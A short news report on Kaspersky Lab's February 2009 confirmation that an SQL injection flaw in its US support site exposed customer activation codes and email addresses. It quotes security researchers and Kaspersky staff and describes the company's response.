Kaspersky Confirmed Data Breach on its Website

Moscow-based security firm Kaspersky Lab confirmed a security breach on February 9, 2009 in which database consisting of customer details remained exposed for nearly eleven days. The security company said that it came to know about the breach when the Romanian hackers informed about the breach to the company on February 7, 2009.

Kaspersky Lab states that the security breach began on January 28, 2009 when website administrators made changes in the 'support' section of the site usa.kaspersky.com.

A hacker who disclosed his identity as "unu" said that he was responsible for the hack and also stated that Kaspersky's site was clearly vulnerable to SQL injections. The security specialists disclosed that SQL injection attacks involved a tiny malicious code insertion into a a database that supplies information to the target website. Criminals most commonly release malware through SQL injections to hijack business websites.

Meanwhile, after the hacker put up his discoveries on the "Hackers Blog site", security specialists said that it was possible for any hacker to install malware on Kaspersky's website. Chief Security Strategist at IBM, Gunter Ollman, states that he is worried that such a critical vulnerability could potentially be exploited to seize legitimate renewals and purchases of Kaspersky's software products that could involve linking to backdoored and malicious versions of the company's software, as reported by bit-tech on February 9, 2009.

While confirming the SQL injection attack, Roel Schouwenberg, Senior antivirus Researcher at Kaspersky, stated that as many as about 25,000 activation codes and about 2,500 e-mail addresses of users were at risk , as reported by Computerworld on February 9, 2009.

Schouwenberg also observed that there were some inaccuracies with Kaspersky's process of reviewing the company's internal code. He added that Kaspersky was now assessing that process in a much stricter way.

Meanwhile, Kaspersky hired the services of another security firm that would independently audit Kaspersky's systems.

Notably, in a similar incident, an SQL injection attack against Microsoft's UK website in 2007 was launched by hackers to insert HTML code. This attack defaced the website pages and also exposed them to malware.